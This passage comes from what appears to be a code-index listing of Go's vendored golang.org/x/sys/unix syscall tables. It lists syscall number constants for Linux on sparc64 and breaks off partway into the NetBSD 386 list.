(line 379) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 380) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 381) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 382) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 383) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_sparc64.go constant SYS_RESTART_SYSCALL (line 9) | SYS_RESTART_SYSCALL = 0 constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 16) | SYS_WAIT4 = 7 constant SYS_CREAT (line 17) | SYS_CREAT = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_EXECV (line 20) | SYS_EXECV = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_CHOWN (line 22) | SYS_CHOWN = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_LCHOWN (line 25) | SYS_LCHOWN = 16 constant SYS_BRK (line 26) | SYS_BRK = 17 constant SYS_PERFCTR (line 27) | SYS_PERFCTR = 18 constant SYS_LSEEK (line 28) | SYS_LSEEK = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_CAPGET (line 30) | SYS_CAPGET = 21 constant SYS_CAPSET (line 31) | SYS_CAPSET = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_VMSPLICE (line 34) | SYS_VMSPLICE = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_ALARM (line 36) | SYS_ALARM = 27 constant SYS_SIGALTSTACK (line 37) | SYS_SIGALTSTACK = 28 constant SYS_PAUSE (line 38) | SYS_PAUSE = 29 constant SYS_UTIME (line 39) | SYS_UTIME = 30 constant SYS_ACCESS (line 40) | SYS_ACCESS = 33 constant SYS_NICE (line 41) | SYS_NICE = 34 constant SYS_SYNC (line 42) | SYS_SYNC = 36 constant SYS_KILL (line 43) | SYS_KILL = 37 constant SYS_STAT (line 44) | SYS_STAT = 38 constant SYS_SENDFILE (line 45) | SYS_SENDFILE = 39 constant SYS_LSTAT (line 46) | SYS_LSTAT = 40 constant SYS_DUP (line 47) | SYS_DUP = 41 constant SYS_PIPE (line 48) | SYS_PIPE = 42 constant SYS_TIMES (line 49) | SYS_TIMES = 43 constant SYS_UMOUNT2 (line 50) | SYS_UMOUNT2 = 45 constant SYS_SETGID (line 51) | SYS_SETGID = 46 constant SYS_GETGID (line 52) | SYS_GETGID = 47 constant SYS_SIGNAL (line 53) | SYS_SIGNAL = 48 constant SYS_GETEUID (line 54) | SYS_GETEUID = 49 constant SYS_GETEGID (line 55) | SYS_GETEGID = 50 constant SYS_ACCT (line 56) | SYS_ACCT = 51 constant SYS_MEMORY_ORDERING (line 57) | SYS_MEMORY_ORDERING = 52 constant SYS_IOCTL (line 58) | SYS_IOCTL = 54 constant SYS_REBOOT (line 59) | SYS_REBOOT = 55 constant SYS_SYMLINK (line 60) | SYS_SYMLINK = 57 constant SYS_READLINK (line 61) | SYS_READLINK = 58 constant SYS_EXECVE (line 62) | SYS_EXECVE = 59 constant SYS_UMASK (line 63) | SYS_UMASK = 60 constant SYS_CHROOT (line 64) | SYS_CHROOT = 61 constant SYS_FSTAT (line 65) | SYS_FSTAT = 62 constant SYS_FSTAT64 (line 66) | SYS_FSTAT64 = 63 constant SYS_GETPAGESIZE (line 67) | SYS_GETPAGESIZE = 64 constant SYS_MSYNC (line 68) | SYS_MSYNC = 65 constant SYS_VFORK (line 69) | SYS_VFORK = 66 constant SYS_PREAD64 (line 70) | SYS_PREAD64 = 67 constant SYS_PWRITE64 (line 71) | SYS_PWRITE64 = 68 constant SYS_MMAP (line 72) | SYS_MMAP = 71 constant SYS_MUNMAP (line 73) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 74) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 75) | SYS_MADVISE = 75 constant SYS_VHANGUP (line 76) | SYS_VHANGUP = 76 constant SYS_MINCORE (line 77) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 78) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 79) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 80) | SYS_GETPGRP = 81 constant SYS_SETITIMER (line 81) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 82) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 83) | SYS_GETITIMER = 86 constant SYS_SETHOSTNAME (line 84) | SYS_SETHOSTNAME = 88 constant SYS_DUP2 (line 85) | SYS_DUP2 = 90 constant SYS_FCNTL (line 86) | SYS_FCNTL = 92 constant SYS_SELECT (line 87) | SYS_SELECT = 93 constant SYS_FSYNC (line 88) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 89) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 90) | SYS_SOCKET = 97 constant SYS_CONNECT (line 91) | SYS_CONNECT = 98 constant SYS_ACCEPT (line 92) | SYS_ACCEPT = 99 constant SYS_GETPRIORITY (line 93) | SYS_GETPRIORITY = 100 constant SYS_RT_SIGRETURN (line 94) | SYS_RT_SIGRETURN = 101 constant SYS_RT_SIGACTION (line 95) | SYS_RT_SIGACTION = 102 constant SYS_RT_SIGPROCMASK (line 96) | SYS_RT_SIGPROCMASK = 103 constant SYS_RT_SIGPENDING (line 97) | SYS_RT_SIGPENDING = 104 constant SYS_RT_SIGTIMEDWAIT (line 98) | SYS_RT_SIGTIMEDWAIT = 105 constant SYS_RT_SIGQUEUEINFO (line 99) | SYS_RT_SIGQUEUEINFO = 106 constant SYS_RT_SIGSUSPEND (line 100) | SYS_RT_SIGSUSPEND = 107 constant SYS_SETRESUID (line 101) | SYS_SETRESUID = 108 constant SYS_GETRESUID (line 102) | SYS_GETRESUID = 109 constant SYS_SETRESGID (line 103) | SYS_SETRESGID = 110 constant SYS_GETRESGID (line 104) | SYS_GETRESGID = 111 constant SYS_RECVMSG (line 105) | SYS_RECVMSG = 113 constant SYS_SENDMSG (line 106) | SYS_SENDMSG = 114 constant SYS_GETTIMEOFDAY (line 107) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 108) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 109) | SYS_GETSOCKOPT = 118 constant SYS_GETCWD (line 110) | SYS_GETCWD = 119 constant SYS_READV (line 111) | SYS_READV = 120 constant SYS_WRITEV (line 112) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 113) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 114) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 115) | SYS_FCHMOD = 124 constant SYS_RECVFROM (line 116) | SYS_RECVFROM = 125 constant SYS_SETREUID (line 117) | SYS_SETREUID = 126 constant SYS_SETREGID (line 118) | SYS_SETREGID = 127 constant SYS_RENAME (line 119) | SYS_RENAME = 128 constant SYS_TRUNCATE (line 120) | SYS_TRUNCATE = 129 constant SYS_FTRUNCATE (line 121) | SYS_FTRUNCATE = 130 constant SYS_FLOCK (line 122) | SYS_FLOCK = 131 constant SYS_LSTAT64 (line 123) | SYS_LSTAT64 = 132 constant SYS_SENDTO (line 124) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 125) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 126) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 127) | SYS_MKDIR = 136 constant SYS_RMDIR (line 128) | SYS_RMDIR = 137 constant SYS_UTIMES (line 129) | SYS_UTIMES = 138 constant SYS_STAT64 (line 130) | SYS_STAT64 = 139 constant SYS_SENDFILE64 (line 131) | SYS_SENDFILE64 = 140 constant SYS_GETPEERNAME (line 132) | SYS_GETPEERNAME = 141 constant SYS_FUTEX (line 133) | SYS_FUTEX = 142 constant SYS_GETTID (line 134) | SYS_GETTID = 143 constant SYS_GETRLIMIT (line 135) | SYS_GETRLIMIT = 144 constant SYS_SETRLIMIT (line 136) | SYS_SETRLIMIT = 145 constant SYS_PIVOT_ROOT (line 137) | SYS_PIVOT_ROOT = 146 constant SYS_PRCTL (line 138) | SYS_PRCTL = 147 constant SYS_PCICONFIG_READ (line 139) | SYS_PCICONFIG_READ = 148 constant SYS_PCICONFIG_WRITE (line 140) | SYS_PCICONFIG_WRITE = 149 constant SYS_GETSOCKNAME (line 141) | SYS_GETSOCKNAME = 150 constant SYS_INOTIFY_INIT (line 142) | SYS_INOTIFY_INIT = 151 constant SYS_INOTIFY_ADD_WATCH (line 143) | SYS_INOTIFY_ADD_WATCH = 152 constant SYS_POLL (line 144) | SYS_POLL = 153 constant SYS_GETDENTS64 (line 145) | SYS_GETDENTS64 = 154 constant SYS_INOTIFY_RM_WATCH (line 146) | SYS_INOTIFY_RM_WATCH = 156 constant SYS_STATFS (line 147) | SYS_STATFS = 157 constant SYS_FSTATFS (line 148) | SYS_FSTATFS = 158 constant SYS_UMOUNT (line 149) | SYS_UMOUNT = 159 constant SYS_SCHED_SET_AFFINITY (line 150) | SYS_SCHED_SET_AFFINITY = 160 constant SYS_SCHED_GET_AFFINITY (line 151) | SYS_SCHED_GET_AFFINITY = 161 constant SYS_GETDOMAINNAME (line 152) | SYS_GETDOMAINNAME = 162 constant SYS_SETDOMAINNAME (line 153) | SYS_SETDOMAINNAME = 163 constant SYS_UTRAP_INSTALL (line 154) | SYS_UTRAP_INSTALL = 164 constant SYS_QUOTACTL (line 155) | SYS_QUOTACTL = 165 constant SYS_SET_TID_ADDRESS (line 156) | SYS_SET_TID_ADDRESS = 166 constant SYS_MOUNT (line 157) | SYS_MOUNT = 167 constant SYS_USTAT (line 158) | SYS_USTAT = 168 constant SYS_SETXATTR (line 159) | SYS_SETXATTR = 169 constant SYS_LSETXATTR (line 160) | SYS_LSETXATTR = 170 constant SYS_FSETXATTR (line 161) | SYS_FSETXATTR = 171 constant SYS_GETXATTR (line 162) | SYS_GETXATTR = 172 constant SYS_LGETXATTR (line 163) | SYS_LGETXATTR = 173 constant SYS_GETDENTS (line 164) | SYS_GETDENTS = 174 constant SYS_SETSID (line 165) | SYS_SETSID = 175 constant SYS_FCHDIR (line 166) | SYS_FCHDIR = 176 constant SYS_FGETXATTR (line 167) | SYS_FGETXATTR = 177 constant SYS_LISTXATTR (line 168) | SYS_LISTXATTR = 178 constant SYS_LLISTXATTR (line 169) | SYS_LLISTXATTR = 179 constant SYS_FLISTXATTR (line 170) | SYS_FLISTXATTR = 180 constant SYS_REMOVEXATTR (line 171) | SYS_REMOVEXATTR = 181 constant SYS_LREMOVEXATTR (line 172) | SYS_LREMOVEXATTR = 182 constant SYS_SIGPENDING (line 173) | SYS_SIGPENDING = 183 constant SYS_QUERY_MODULE (line 174) | SYS_QUERY_MODULE = 184 constant SYS_SETPGID (line 175) | SYS_SETPGID = 185 constant SYS_FREMOVEXATTR (line 176) | SYS_FREMOVEXATTR = 186 constant SYS_TKILL (line 177) | SYS_TKILL = 187 constant SYS_EXIT_GROUP (line 178) | SYS_EXIT_GROUP = 188 constant SYS_UNAME (line 179) | SYS_UNAME = 189 constant SYS_INIT_MODULE (line 180) | SYS_INIT_MODULE = 190 constant SYS_PERSONALITY (line 181) | SYS_PERSONALITY = 191 constant SYS_REMAP_FILE_PAGES (line 182) | SYS_REMAP_FILE_PAGES = 192 constant SYS_EPOLL_CREATE (line 183) | SYS_EPOLL_CREATE = 193 constant SYS_EPOLL_CTL (line 184) | SYS_EPOLL_CTL = 194 constant SYS_EPOLL_WAIT (line 185) | SYS_EPOLL_WAIT = 195 constant SYS_IOPRIO_SET (line 186) | SYS_IOPRIO_SET = 196 constant SYS_GETPPID (line 187) | SYS_GETPPID = 197 constant SYS_SIGACTION (line 188) | SYS_SIGACTION = 198 constant SYS_SGETMASK (line 189) | SYS_SGETMASK = 199 constant SYS_SSETMASK (line 190) | SYS_SSETMASK = 200 constant SYS_SIGSUSPEND (line 191) | SYS_SIGSUSPEND = 201 constant SYS_OLDLSTAT (line 192) | SYS_OLDLSTAT = 202 constant SYS_USELIB (line 193) | SYS_USELIB = 203 constant SYS_READDIR (line 194) | SYS_READDIR = 204 constant SYS_READAHEAD (line 195) | SYS_READAHEAD = 205 constant SYS_SOCKETCALL (line 196) | SYS_SOCKETCALL = 206 constant SYS_SYSLOG (line 197) | SYS_SYSLOG = 207 constant SYS_LOOKUP_DCOOKIE (line 198) | SYS_LOOKUP_DCOOKIE = 208 constant SYS_FADVISE64 (line 199) | SYS_FADVISE64 = 209 constant SYS_FADVISE64_64 (line 200) | SYS_FADVISE64_64 = 210 constant SYS_TGKILL (line 201) | SYS_TGKILL = 211 constant SYS_WAITPID (line 202) | SYS_WAITPID = 212 constant SYS_SWAPOFF (line 203) | SYS_SWAPOFF = 213 constant SYS_SYSINFO (line 204) | SYS_SYSINFO = 214 constant SYS_IPC (line 205) | SYS_IPC = 215 constant SYS_SIGRETURN (line 206) | SYS_SIGRETURN = 216 constant SYS_CLONE (line 207) | SYS_CLONE = 217 constant SYS_IOPRIO_GET (line 208) | SYS_IOPRIO_GET = 218 constant SYS_ADJTIMEX (line 209) | SYS_ADJTIMEX = 219 constant SYS_SIGPROCMASK (line 210) | SYS_SIGPROCMASK = 220 constant SYS_CREATE_MODULE (line 211) | SYS_CREATE_MODULE = 221 constant SYS_DELETE_MODULE (line 212) | SYS_DELETE_MODULE = 222 constant SYS_GET_KERNEL_SYMS (line 213) | SYS_GET_KERNEL_SYMS = 223 constant SYS_GETPGID (line 214) | SYS_GETPGID = 224 constant SYS_BDFLUSH (line 215) | SYS_BDFLUSH = 225 constant SYS_SYSFS (line 216) | SYS_SYSFS = 226 constant SYS_AFS_SYSCALL (line 217) | SYS_AFS_SYSCALL = 227 constant SYS_SETFSUID (line 218) | SYS_SETFSUID = 228 constant SYS_SETFSGID (line 219) | SYS_SETFSGID = 229 constant SYS__NEWSELECT (line 220) | SYS__NEWSELECT = 230 constant SYS_SPLICE (line 221) | SYS_SPLICE = 232 constant SYS_STIME (line 222) | SYS_STIME = 233 constant SYS_STATFS64 (line 223) | SYS_STATFS64 = 234 constant SYS_FSTATFS64 (line 224) | SYS_FSTATFS64 = 235 constant SYS__LLSEEK (line 225) | SYS__LLSEEK = 236 constant SYS_MLOCK (line 226) | SYS_MLOCK = 237 constant SYS_MUNLOCK (line 227) | SYS_MUNLOCK = 238 constant SYS_MLOCKALL (line 228) | SYS_MLOCKALL = 239 constant SYS_MUNLOCKALL (line 229) | SYS_MUNLOCKALL = 240 constant SYS_SCHED_SETPARAM (line 230) | SYS_SCHED_SETPARAM = 241 constant SYS_SCHED_GETPARAM (line 231) | SYS_SCHED_GETPARAM = 242 constant SYS_SCHED_SETSCHEDULER (line 232) | SYS_SCHED_SETSCHEDULER = 243 constant SYS_SCHED_GETSCHEDULER (line 233) | SYS_SCHED_GETSCHEDULER = 244 constant SYS_SCHED_YIELD (line 234) | SYS_SCHED_YIELD = 245 constant SYS_SCHED_GET_PRIORITY_MAX (line 235) | SYS_SCHED_GET_PRIORITY_MAX = 246 constant SYS_SCHED_GET_PRIORITY_MIN (line 236) | SYS_SCHED_GET_PRIORITY_MIN = 247 constant SYS_SCHED_RR_GET_INTERVAL (line 237) | SYS_SCHED_RR_GET_INTERVAL = 248 constant SYS_NANOSLEEP (line 238) | SYS_NANOSLEEP = 249 constant SYS_MREMAP (line 239) | SYS_MREMAP = 250 constant SYS__SYSCTL (line 240) | SYS__SYSCTL = 251 constant SYS_GETSID (line 241) | SYS_GETSID = 252 constant SYS_FDATASYNC (line 242) | SYS_FDATASYNC = 253 constant SYS_NFSSERVCTL (line 243) | SYS_NFSSERVCTL = 254 constant SYS_SYNC_FILE_RANGE (line 244) | SYS_SYNC_FILE_RANGE = 255 constant SYS_CLOCK_SETTIME (line 245) | SYS_CLOCK_SETTIME = 256 constant SYS_CLOCK_GETTIME (line 246) | SYS_CLOCK_GETTIME = 257 constant SYS_CLOCK_GETRES (line 247) | SYS_CLOCK_GETRES = 258 constant SYS_CLOCK_NANOSLEEP (line 248) | SYS_CLOCK_NANOSLEEP = 259 constant SYS_SCHED_GETAFFINITY (line 249) | SYS_SCHED_GETAFFINITY = 260 constant SYS_SCHED_SETAFFINITY (line 250) | SYS_SCHED_SETAFFINITY = 261 constant SYS_TIMER_SETTIME (line 251) | SYS_TIMER_SETTIME = 262 constant SYS_TIMER_GETTIME (line 252) | SYS_TIMER_GETTIME = 263 constant SYS_TIMER_GETOVERRUN (line 253) | SYS_TIMER_GETOVERRUN = 264 constant SYS_TIMER_DELETE (line 254) | SYS_TIMER_DELETE = 265 constant SYS_TIMER_CREATE (line 255) | SYS_TIMER_CREATE = 266 constant SYS_VSERVER (line 256) | SYS_VSERVER = 267 constant SYS_IO_SETUP (line 257) | SYS_IO_SETUP = 268 constant SYS_IO_DESTROY (line 258) | SYS_IO_DESTROY = 269 constant SYS_IO_SUBMIT (line 259) | SYS_IO_SUBMIT = 270 constant SYS_IO_CANCEL (line 260) | SYS_IO_CANCEL = 271 constant SYS_IO_GETEVENTS (line 261) | SYS_IO_GETEVENTS = 272 constant SYS_MQ_OPEN (line 262) | SYS_MQ_OPEN = 273 constant SYS_MQ_UNLINK (line 263) | SYS_MQ_UNLINK = 274 constant SYS_MQ_TIMEDSEND (line 264) | SYS_MQ_TIMEDSEND = 275 constant SYS_MQ_TIMEDRECEIVE (line 265) | SYS_MQ_TIMEDRECEIVE = 276 constant SYS_MQ_NOTIFY (line 266) | SYS_MQ_NOTIFY = 277 constant SYS_MQ_GETSETATTR (line 267) | SYS_MQ_GETSETATTR = 278 constant SYS_WAITID (line 268) | SYS_WAITID = 279 constant SYS_TEE (line 269) | SYS_TEE = 280 constant SYS_ADD_KEY (line 270) | SYS_ADD_KEY = 281 constant SYS_REQUEST_KEY (line 271) | SYS_REQUEST_KEY = 282 constant SYS_KEYCTL (line 272) | SYS_KEYCTL = 283 constant SYS_OPENAT (line 273) | SYS_OPENAT = 284 constant SYS_MKDIRAT (line 274) | SYS_MKDIRAT = 285 constant SYS_MKNODAT (line 275) | SYS_MKNODAT = 286 constant SYS_FCHOWNAT (line 276) | SYS_FCHOWNAT = 287 constant SYS_FUTIMESAT (line 277) | SYS_FUTIMESAT = 288 constant SYS_FSTATAT64 (line 278) | SYS_FSTATAT64 = 289 constant SYS_UNLINKAT (line 279) | SYS_UNLINKAT = 290 constant SYS_RENAMEAT (line 280) | SYS_RENAMEAT = 291 constant SYS_LINKAT (line 281) | SYS_LINKAT = 292 constant SYS_SYMLINKAT (line 282) | SYS_SYMLINKAT = 293 constant SYS_READLINKAT (line 283) | SYS_READLINKAT = 294 constant SYS_FCHMODAT (line 284) | SYS_FCHMODAT = 295 constant SYS_FACCESSAT (line 285) | SYS_FACCESSAT = 296 constant SYS_PSELECT6 (line 286) | SYS_PSELECT6 = 297 constant SYS_PPOLL (line 287) | SYS_PPOLL = 298 constant SYS_UNSHARE (line 288) | SYS_UNSHARE = 299 constant SYS_SET_ROBUST_LIST (line 289) | SYS_SET_ROBUST_LIST = 300 constant SYS_GET_ROBUST_LIST (line 290) | SYS_GET_ROBUST_LIST = 301 constant SYS_MIGRATE_PAGES (line 291) | SYS_MIGRATE_PAGES = 302 constant SYS_MBIND (line 292) | SYS_MBIND = 303 constant SYS_GET_MEMPOLICY (line 293) | SYS_GET_MEMPOLICY = 304 constant SYS_SET_MEMPOLICY (line 294) | SYS_SET_MEMPOLICY = 305 constant SYS_KEXEC_LOAD (line 295) | SYS_KEXEC_LOAD = 306 constant SYS_MOVE_PAGES (line 296) | SYS_MOVE_PAGES = 307 constant SYS_GETCPU (line 297) | SYS_GETCPU = 308 constant SYS_EPOLL_PWAIT (line 298) | SYS_EPOLL_PWAIT = 309 constant SYS_UTIMENSAT (line 299) | SYS_UTIMENSAT = 310 constant SYS_SIGNALFD (line 300) | SYS_SIGNALFD = 311 constant SYS_TIMERFD_CREATE (line 301) | SYS_TIMERFD_CREATE = 312 constant SYS_EVENTFD (line 302) | SYS_EVENTFD = 313 constant SYS_FALLOCATE (line 303) | SYS_FALLOCATE = 314 constant SYS_TIMERFD_SETTIME (line 304) | SYS_TIMERFD_SETTIME = 315 constant SYS_TIMERFD_GETTIME (line 305) | SYS_TIMERFD_GETTIME = 316 constant SYS_SIGNALFD4 (line 306) | SYS_SIGNALFD4 = 317 constant SYS_EVENTFD2 (line 307) | SYS_EVENTFD2 = 318 constant SYS_EPOLL_CREATE1 (line 308) | SYS_EPOLL_CREATE1 = 319 constant SYS_DUP3 (line 309) | SYS_DUP3 = 320 constant SYS_PIPE2 (line 310) | SYS_PIPE2 = 321 constant SYS_INOTIFY_INIT1 (line 311) | SYS_INOTIFY_INIT1 = 322 constant SYS_ACCEPT4 (line 312) | SYS_ACCEPT4 = 323 constant SYS_PREADV (line 313) | SYS_PREADV = 324 constant SYS_PWRITEV (line 314) | SYS_PWRITEV = 325 constant SYS_RT_TGSIGQUEUEINFO (line 315) | SYS_RT_TGSIGQUEUEINFO = 326 constant SYS_PERF_EVENT_OPEN (line 316) | SYS_PERF_EVENT_OPEN = 327 constant SYS_RECVMMSG (line 317) | SYS_RECVMMSG = 328 constant SYS_FANOTIFY_INIT (line 318) | SYS_FANOTIFY_INIT = 329 constant SYS_FANOTIFY_MARK (line 319) | SYS_FANOTIFY_MARK = 330 constant SYS_PRLIMIT64 (line 320) | SYS_PRLIMIT64 = 331 constant SYS_NAME_TO_HANDLE_AT (line 321) | SYS_NAME_TO_HANDLE_AT = 332 constant SYS_OPEN_BY_HANDLE_AT (line 322) | SYS_OPEN_BY_HANDLE_AT = 333 constant SYS_CLOCK_ADJTIME (line 323) | SYS_CLOCK_ADJTIME = 334 constant SYS_SYNCFS (line 324) | SYS_SYNCFS = 335 constant SYS_SENDMMSG (line 325) | SYS_SENDMMSG = 336 constant SYS_SETNS (line 326) | SYS_SETNS = 337 constant SYS_PROCESS_VM_READV (line 327) | SYS_PROCESS_VM_READV = 338 constant SYS_PROCESS_VM_WRITEV (line 328) | SYS_PROCESS_VM_WRITEV = 339 constant SYS_KERN_FEATURES (line 329) | SYS_KERN_FEATURES = 340 constant SYS_KCMP (line 330) | SYS_KCMP = 341 constant SYS_FINIT_MODULE (line 331) | SYS_FINIT_MODULE = 342 constant SYS_SCHED_SETATTR (line 332) | SYS_SCHED_SETATTR = 343 constant SYS_SCHED_GETATTR (line 333) | SYS_SCHED_GETATTR = 344 constant SYS_RENAMEAT2 (line 334) | SYS_RENAMEAT2 = 345 constant SYS_SECCOMP (line 335) | SYS_SECCOMP = 346 constant SYS_GETRANDOM (line 336) | SYS_GETRANDOM = 347 constant SYS_MEMFD_CREATE (line 337) | SYS_MEMFD_CREATE = 348 constant SYS_BPF (line 338) | SYS_BPF = 349 constant SYS_EXECVEAT (line 339) | SYS_EXECVEAT = 350 constant SYS_MEMBARRIER (line 340) | SYS_MEMBARRIER = 351 constant SYS_USERFAULTFD (line 341) | SYS_USERFAULTFD = 352 constant SYS_BIND (line 342) | SYS_BIND = 353 constant SYS_LISTEN (line 343) | SYS_LISTEN = 354 constant SYS_SETSOCKOPT (line 344) | SYS_SETSOCKOPT = 355 constant SYS_MLOCK2 (line 345) | SYS_MLOCK2 = 356 constant SYS_COPY_FILE_RANGE (line 346) | SYS_COPY_FILE_RANGE = 357 constant SYS_PREADV2 (line 347) | SYS_PREADV2 = 358 constant SYS_PWRITEV2 (line 348) | SYS_PWRITEV2 = 359 constant SYS_STATX (line 349) | SYS_STATX = 360 constant SYS_IO_PGETEVENTS (line 350) | SYS_IO_PGETEVENTS = 361 constant SYS_PKEY_MPROTECT (line 351) | SYS_PKEY_MPROTECT = 362 constant SYS_PKEY_ALLOC (line 352) | SYS_PKEY_ALLOC = 363 constant SYS_PKEY_FREE (line 353) | SYS_PKEY_FREE = 364 constant SYS_RSEQ (line 354) | SYS_RSEQ = 365 constant SYS_SEMTIMEDOP (line 355) | SYS_SEMTIMEDOP = 392 constant SYS_SEMGET (line 356) | SYS_SEMGET = 393 constant SYS_SEMCTL (line 357) | SYS_SEMCTL = 394 constant SYS_SHMGET (line 358) | SYS_SHMGET = 395 constant SYS_SHMCTL (line 359) | SYS_SHMCTL = 396 constant SYS_SHMAT (line 360) | SYS_SHMAT = 397 constant SYS_SHMDT (line 361) | SYS_SHMDT = 398 constant SYS_MSGGET (line 362) | SYS_MSGGET = 399 constant SYS_MSGSND (line 363) | SYS_MSGSND = 400 constant SYS_MSGRCV (line 364) | SYS_MSGRCV = 401 constant SYS_MSGCTL (line 365) | SYS_MSGCTL = 402 constant SYS_PIDFD_SEND_SIGNAL (line 366) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 367) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 368) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 369) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 370) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 371) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 372) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 373) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 374) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 375) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 376) | SYS_PIDFD_OPEN = 434 constant SYS_CLOSE_RANGE (line 377) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 378) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 379) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 380) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 381) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 382) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 383) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 384) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 385) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 386) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 387) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_PROCESS_MRELEASE (line 388) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 389) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 390) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 391) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 392) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 393) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 394) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 395) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 396) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_netbsd_386.go constant SYS_EXIT (line 9) | SYS_EXIT = 1 constant SYS_FORK (line 10) | SYS_FORK = 2 constant SYS_READ (line 11) | SYS_READ = 3 constant SYS_WRITE (line 12) | SYS_WRITE = 4 constant SYS_OPEN (line 13) | SYS_OPEN = 5 constant SYS_CLOSE (line 14) | SYS_CLOSE = 6 constant SYS_LINK (line 15) | SYS_LINK = 9 constant SYS_UNLINK (line 16) | SYS_UNLINK = 10 constant SYS_CHDIR (line 17) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 18) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 19) | SYS_CHMOD = 15 constant SYS_CHOWN (line 20) | SYS_CHOWN = 16 constant SYS_BREAK (line 21) | SYS_BREAK = 17 constant SYS_GETPID (line 22) | SYS_GETPID = 20 constant SYS_UNMOUNT (line 23) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 24) | SYS_SETUID = 23 constant SYS_GETUID (line 25) | SYS_GETUID = 24 constant SYS_GETEUID (line 26) | SYS_GETEUID = 25 constant SYS_PTRACE (line 27) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 28) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 29) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 30) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 31) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 32) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 33) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 34) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 35) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 36) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 37) | SYS_SYNC = 36 constant SYS_KILL (line 38) | SYS_KILL = 37 constant SYS_GETPPID (line 39) | SYS_GETPPID = 39 constant SYS_DUP (line 40) | SYS_DUP = 41 constant SYS_PIPE (line 41) | SYS_PIPE = 42 constant SYS_GETEGID (line 42) | SYS_GETEGID = 43 constant SYS_PROFIL (line 